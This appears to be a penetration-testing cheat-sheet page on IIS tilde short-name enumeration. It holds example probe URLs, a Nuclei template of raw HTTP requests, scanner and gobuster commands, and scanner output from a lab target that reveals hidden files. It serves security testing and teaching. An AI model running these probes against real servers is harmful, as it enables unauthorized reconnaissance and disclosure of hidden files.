IIS

Tilde Enumeration

http://example.com/~a
http://example.com/~b
http://example.com/~c
...

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory with a short name beginning with "s"

http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...

Once the short name secret~1 is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents

http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

http://example.com/secret~1/somefi~1.txt

If two files named somefile.txt and somefile1.txt exist in the same directory, their 8.3 short file names would be:

  • somefi~1.txt for somefile.txt

  • somefi~2.txt for somefile1.txt

IIs Tilde Enumration Scanner - Burp Extension

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml

id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:

    - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"

ShortScan

shortscan http://yourtarget.com -F

IIS ShortName Scanner

java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, necessitating the brute-forcing of the remaining filename.

Or:

# python iis_shortname_scan.py http://target

Generate Wordlist

egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt

Fuzzing

gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp

Resources

Script to configure IIS

PreviousNginxNextExchange / OWA

Last updated